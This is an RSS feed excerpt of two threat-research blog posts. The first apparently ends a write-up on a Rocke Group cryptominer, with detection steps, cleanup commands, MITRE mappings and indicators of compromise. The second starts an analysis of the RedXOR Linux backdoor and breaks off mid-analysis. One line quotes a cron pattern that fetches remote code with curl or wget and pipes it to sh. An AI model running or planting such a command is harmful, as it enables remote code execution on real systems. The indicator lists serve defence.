&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;systemctl stop &lt;span class="o"&gt;[&lt;/span&gt;servicename&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; systemctl disable &lt;span class="o"&gt;[&lt;/span&gt;servicename&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; rm /etc/systemd/system/&lt;span class="o"&gt;[&lt;/span&gt;servicename&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; rm /etc/systemd/system/&lt;span class="o"&gt;[&lt;/span&gt;servicename&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; rm /usr/lib/systemd/system/&lt;span class="o"&gt;[&lt;/span&gt;servicename&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; rm /usr/lib/systemd/system/&lt;span class="o"&gt;[&lt;/span&gt;servicename&lt;span class="o"&gt;]&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; systemctl daemon-reload systemctl reset-failed&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;MITRE Technique:
&lt;a href="https://attack.mitre.org/techniques/T1543/002/"target="_blank" rel="noopener"&gt;Create System Process (T1543)&lt;/a&gt;
and &lt;a href="https://attack.mitre.org/techniques/T1036/"target="_blank" rel="noopener"&gt;Masquerading (T1036)&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Check if the cron jobs include commands in the following format:
&lt;code&gt;*/15 * * * * (curl -fsSL -m180 ||wget -q -T180 -O- )|sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Check the following location of scheduled jobs:
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/var/spool/cron/root&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/var/spool/cron/crontabs/root&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/etc/cron.d/root&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Response&lt;/strong&gt;: Delete these commands from the crontab.&lt;/p&gt;
&lt;p&gt;MITRE Technique:
&lt;a href="https://attack.mitre.org/techniques/T1053/"target="_blank" rel="noopener"&gt;Scheduled Task/Job (T1053)&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Check that &lt;code&gt;/etc/bashrc&lt;/code&gt; contains commands in the same format as the crontab
files&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Response&lt;/strong&gt;: Delete the commands from the file.&lt;/p&gt;
&lt;p&gt;MITRE Technique:
&lt;a href="https://attack.mitre.org/techniques/T1546/004/"target="_blank" rel="noopener"&gt;Event Triggered Execution using .bashrc file (T1546)&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This campaign uses DNS over HTTPs (DoH) to obtain the address of the C2
server using hard-coded domains that send back an encrypted DNS record.
Inspect your network traffic for anomalies in HTTPs packages. Check if your
machine tried to access one (or more) of the following domains:
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Update.iap5u1rbety6vifaxsi9vovnc9jjay2l[.]com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cloudflare-dns[.]com&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;MITRE Technique:
&lt;a href="https://attack.mitre.org/techniques/T1572/"target="_blank" rel="noopener"&gt;Protocol Tunneling (T1572)&lt;/a&gt; and
&lt;a href="https://attack.mitre.org/techniques/T1573/"target="_blank" rel="noopener"&gt;Encrypted Channel (T1573)&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The malware tries to infect other machines in the network by brute forcing
weak passwords and exploiting vulnerabilities in Jenkins, Redis, SSH and
ActiveMQ. Follow all of the steps above for machines that have these
services.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;MITRE Technique:
&lt;a href="https://attack.mitre.org/techniques/T1046/"target="_blank" rel="noopener"&gt;Network Service Scanning (T1046)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;TTPs now available in Intezer. Speed up malware analysis with relevant insights
to understand how malware behaves.&lt;/p&gt;
&lt;h2&gt;Be Proactive&lt;span class="hx:absolute hx:-mt-20" id="be-proactive"&gt;&lt;/span&gt;
&lt;a href="#be-proactive" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Use strong passwords for SSH, Jenkins and Redis services. It is also highly
recommended to use TLS authentication.&lt;/li&gt;
&lt;li&gt;Use different passwords and authentication keys for each machine in the
network.&lt;/li&gt;
&lt;li&gt;Make sure that your Jenkins and ActiveMQ services have the latest updates.&lt;/li&gt;
&lt;li&gt;Restrict access to services and machines, and give only the required
permissions for each user.&lt;/li&gt;
&lt;li&gt;Filter network traffic to untrusted or known bad domains.&lt;/li&gt;
&lt;li&gt;Apply detection of anomalies in the networks to detect suspicious
communication that digresses from the usual traffic.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Runtime Protection is a Must&lt;span class="hx:absolute hx:-mt-20" id="runtime-protection-is-a-must"&gt;&lt;/span&gt;
&lt;a href="#runtime-protection-is-a-must" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;This attack is sophisticated in that it implements evasion techniques making
detection much harder. It also spreads to other services and machines on the
network making it harder to respond to. Runtime protection gives you immediate
visibility over all code running in your systems and alerts you whenever
unauthorized code is executed. So, if Rocke Group attacks an environment with
runtime protection, the user would immediately get an alert on all infected
machines with the ability to terminate the malicious processes. While there are
dozens of cloud attack vectors that threat actors can utilize, such as software
vulnerabilities and misconfigurations, eventually all attackers must run code
or commands in the production environment to conduct any damage. Consider that
it&amp;rsquo;s not realistic to be able to close all attack vectors. Not only does it
take time to fix vulnerabilities, but there are always attack vectors that are
practically impossible to prevent such as supply chain or unknown
vulnerabilities. Recent attacks have shown that Linux cryptominers and other
threats will find their way into the production environment no matter how hard
you work to reduce the attack surface. Runtime protection is a necessary last
line of defense as actors like Rocke Group remain active.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Thanks to Joakim Kennedy for contributing to this post.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Dropper Script&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;f947e69f9f8d113fb9fba3e795827110ee17feb310b54a7f7b6672a5386a3de2&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Malware&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;fe27d4a8a5f299b0b25d10816e98cef2852af6dc3541bf25a77960b1573ca61d&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Mining Pool&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;minexmr[.]com pool&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;XMRig Miner&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;398e3608455dbea2cba8e9944d9b43cbb0982b48b2882fe54adf937a7a62d9e2&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Domains Used to Download the Malware&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;img[.]sobot.com
cdn[.]xiaoduoai.com
https://user-images[.]githubusercontent.com&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Domains Used for Resolving the C2 Address&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;update.iap5u1rbety6vifaxsi9vovnc9jjay2l[.]com
cloudflare-dns[.]com&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>New Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor</title><link>https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/</link><pubDate>Wed, 10 Mar 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/</guid><description>
&lt;ul&gt;
&lt;li&gt;We discovered a new sophisticated backdoor targeting Linux endpoints and
servers&lt;/li&gt;
&lt;li&gt;Based on Tactics, Techniques, and Procedures (TTPs) the backdoor is believed
to be developed by Chinese nation-state actors&lt;/li&gt;
&lt;li&gt;The backdoor masquerades itself as polkit daemon. We named it RedXOR for its
network data encoding scheme based on XOR. The malware was compiled on Red
Hat Enterprise Linux&lt;/li&gt;
&lt;li&gt;We provide recommendations for detecting and responding to this threat below&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Intro&lt;span class="hx:absolute hx:-mt-20" id="intro"&gt;&lt;/span&gt;
&lt;a href="#intro" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;2020
&lt;a href="https://intezer.com/blog/cloud-security/2020-set-record-for-new-linux-malware-families/"target="_blank" rel="noopener"&gt;set a record&lt;/a&gt;
for new Linux malware families. New malware families targeting Linux systems
are being discovered on a regular basis. Backdoors attributed to advanced
threat actors are disclosed less frequently.&lt;/p&gt;
&lt;p&gt;We have discovered an undocumented backdoor targeting Linux systems,
masqueraded as &lt;a href="https://linux.die.net/man/8/polkitd"target="_blank" rel="noopener"&gt;polkit daemon&lt;/a&gt;. We named
it RedXOR for its network data encoding scheme based on XOR.&lt;/p&gt;
&lt;p&gt;Based on victimology, as well as similar components and Tactics, Techniques,
and Procedures (TTPs), we believe RedXOR was developed by high profile Chinese
threat actors. The samples, which have low detection rates in VirusTotal, were
uploaded from Indonesia and Taiwan, countries known to be targeted by Chinese
threat actors. The samples are compiled with a legacy GCC compiler on an old
release of Red Hat Enterprise Linux, hinting that RedXOR is used in targeted
attacks against legacy Linux systems.&lt;/p&gt;
&lt;p&gt;During our investigation we experienced an &amp;ldquo;on and off&amp;rdquo; availability of the
Command and Control (C2) server indicating that the operation is still active.&lt;/p&gt;
&lt;h2&gt;Connections to Chinese Threat Actors&lt;span class="hx:absolute hx:-mt-20" id="connections-to-chinese-threat-actors"&gt;&lt;/span&gt;
&lt;a href="#connections-to-chinese-threat-actors" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;We uncovered key similarities between RedXOR and previously reported malware
associated with Winnti umbrella threat group. These malware are PWNLNX backdoor
and XOR.DDOS and Groundhog, two botnets attributed to Winnti by
&lt;a href="https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"target="_blank" rel="noopener"&gt;BlackBerry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The below samples can be used for reference:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;PWNLNX –
&lt;a href="https://analyze.intezer.com/files/6a9f16440b9319f427825bb12d7a0cda89b101cf7b8b15ec7dd620b4d68db514"target="_blank" rel="noopener"&gt;4278ab79c34ea92788259fb43e535aa3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;XOR.DDOS –
&lt;a href="https://analyze.intezer.com/files/dba757c20fbc1d81566ef2877a9bfca9b3ddb84b9f04c0ca5ae668b7f40ea8c3"target="_blank" rel="noopener"&gt;d6a6dee6afa6879b729a0af3cde7ff33&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Similarities between the samples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Use of old open-source kernel rootkits: RedXOR uses an open-source LKM
rootkit called &amp;ldquo;&lt;a href="https://github.com/yaoyumeng/adore-ng"target="_blank" rel="noopener"&gt;Adore-ng&lt;/a&gt;&amp;rdquo; to hide
its process. Based on a
&lt;a href="https://content.fireeye.com/apt-41/rpt-apt41/"target="_blank" rel="noopener"&gt;FireEye report&lt;/a&gt; Winnti used
this rootkit in their &amp;ldquo;ADORE.XSE&amp;rdquo; Linux backdoor. Embedding open-source LKM
rootkits is a common Winnti technique. The group has been documented using
&lt;a href="https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a"target="_blank" rel="noopener"&gt;Azazel&lt;/a&gt;
and
&lt;a href="https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf#MKTG%2020-0089%20Decade_the_RAT%27s_Report.indd%3A.176091%3A522"target="_blank" rel="noopener"&gt;Suterusu&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The &lt;code&gt;CheckLKM&lt;/code&gt; function name used by RedXOR has also been used in PWNLNX and
XOR.DDOS.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Provides the operator with a pseudo-terminal: RedXOR uses Python pty shell by
importing the &lt;a href="https://docs.python.org/3/library/pty.html"target="_blank" rel="noopener"&gt;python pty&lt;/a&gt;
library. PWNLNX implements the pty shell function in c.
&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig1.png" title="Figure 1: Python pty shell used in RedXOR" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Python pty shell used in RedXOR&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Encoding network with XOR: The backdoor encodes its network data with a
scheme based on XOR. Encoding network data with XOR has been used in previous
Winnti malware including PWNLNX.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Persistence service name: As part of its persistence methods, RedXOR attempts
to create a service under rc.d. The developer added &amp;ldquo;S99&amp;rdquo; before the name of
the service to lower its priority and make it run last on system initiation.
This technique was used in XOR.DDOS and Groundhog samples where the malware
developer added &amp;ldquo;S90&amp;rdquo; to the service name.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Main functions flow: PWNLX and RedXOR have a main function which is in charge
of initialization. In both backdoors, the main function calls another
function which is in charge of the main logic. The main logic function names
are main_process in RedXOR and MainThread in PWLNX. Both main functions
daemonize the process to detach from the terminal and run in the background.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;XML for file listing: RedXOR’s directory function and PWNLNX’s getfiles
function are both in charge of directory listing. Their code flow
implementation is different, however, as both malware send the directory
listing as an XML file to the C2 server. Figure 2 shows the XML structure
used in PWNLNX and RedXOR. The file’s data used in both functions are: path,
name, type, user, permission, size, time.
&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig2.png" title="Figure 2: The XML structure used by PWNLNX’s getfiles function and RedXOR’s directory function" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: The XML structure used by PWNLNX’s getfiles function and RedXOR’s directory function&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Legacy Red Hat compilers: RedXOR and PWNLNX were both compiled with a Red Hat
4.4.7 compiler. This compiler is the default GCC compiler on RHEL6.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Chown similarity: Both PWNLNX and RedXOR change the file’s user and group
owner to a large ID. The same technique has been used by the XOR.DDoS malware
as referenced in the analysis by
&lt;a href="https://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html"target="_blank" rel="noopener"&gt;MalwareMustDie&lt;/a&gt;.
&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig3.png" title="Figure 3: Similarity between PWNLNX and RedXOR of the UID and GID used with lchown function call" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 3: Similarity between PWNLNX and RedXOR of the UID and GID used with lchown function call&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Overall flow and functionalities: The overall code flow, behavior, and
capabilities of RedXOR are very similar to PWNLNX. Both have file uploading
and downloading functionalities together with a running shell. The network
tunneling functionality in both families is called &amp;ldquo;PortMap&amp;rdquo;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Unstripped ELF binaries: Malware developers will often tamper with a file’s
symbols and/or sections, making it harder for researchers to analyze them.
However, RedXOR and various Winnti malware, including PWNLNX and XOR.DDOS,
are unstripped.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The samples are both unstripped 64-bit ELF files called po1kitd-update-k.
Uploaded to VirusTotal from Taiwan and Indonesia, they are low detected at the
time of this writing.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig4.png" title="Figure 4: 2bd6e2f8c1a97347b1e499e29a1d9b7c in VirusTotal" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 4: 2bd6e2f8c1a97347b1e499e29a1d9b7c in VirusTotal&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Malware Installation&lt;span class="hx:absolute hx:-mt-20" id="malware-installation"&gt;&lt;/span&gt;
&lt;a href="#malware-installation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Upon execution RedXOR forks off a child process allowing the parent process to
exit. The purpose is to detach the process from the shell. The new child
determines if it has been executed as the root user or as another user on the
system. It does this to create a hidden folder, called &lt;code&gt;.po1kitd.thumb&lt;/code&gt;, inside
the user’s home folder which is used to store files related to the malware. The
malware creates a hidden file called &lt;code&gt;.po1kitd-2a4D53&lt;/code&gt; inside the folder. The
file is locked to the current running process, seen in Figure 5, essentially
creating a mutex. If another instance of the malware is executed, it also tries
to obtain the lock but ultimately fails. Upon this failure the process exits.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig5.png" title="Figure 5: The malware creates a mutex file locking it to the process ID" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 5: The malware creates a mutex file locking it to the process ID&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;After the malware creates the mutex, it installs itself on the infected
machine. As shown in Figure 6, the malware looks up its current path and moves
the binary to the created folder. It hides the file by naming it
&lt;code&gt;.po1kitd-update-k&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig6.png" title="Figure 6: Malware moves the binary to the hidden folder po1kitd.thumb created earlier. It first tries to use the rename function provided by libc. If this fails, it executes an mv shell command via the system function" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 6: Malware moves the binary to the hidden folder po1kitd.thumb created earlier. It first tries to use the rename function provided by libc. If this fails, it executes an mv shell command via the system function&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;After installing the binary to the hidden folder, the malware sets up
persistence via &lt;code&gt;init&lt;/code&gt; scripts. The following files are created after executing
the malware on boot:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/usr/syno/etc/rc.d/S99po1kitd-update.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/etc/init.d/po1kitd-update&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/etc/rc2.d/S99po1kitd-update&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The malware checks if the rootkit is active by creating a file and removing it.
Then, the malware compares the &amp;ldquo;saved set-user-ID&amp;rdquo; of the process to the user
ID. If they don’t match, the rootkit is enabled. If they match, it looks to see
if the user ID is &amp;ldquo;10&amp;rdquo;. If this is the case, the rootkit is enabled. This logic
is shown in Figure 7.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig7.png" title="Figure 7: Logic used by RedXOR to check if the rootkit is enabled" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 7: Logic used by RedXOR to check if the rootkit is enabled&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;CheckLKM&lt;/code&gt; logic is almost identical to the &lt;code&gt;adore_init&lt;/code&gt; function in the
&amp;ldquo;adore-ng&amp;rdquo; rootkit. Afore-ng is a Chinese open-source LKM (Loadable Kernel
Module) rootkit. This technique allows the malware to stay under the radar by
hiding its processes. The code for the init function is shown in Figure 8.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/images/fig8.png" title="Figure 8: Client authentication code for the adore-ng rootkit" alt="" loading="lazy" /&gt;
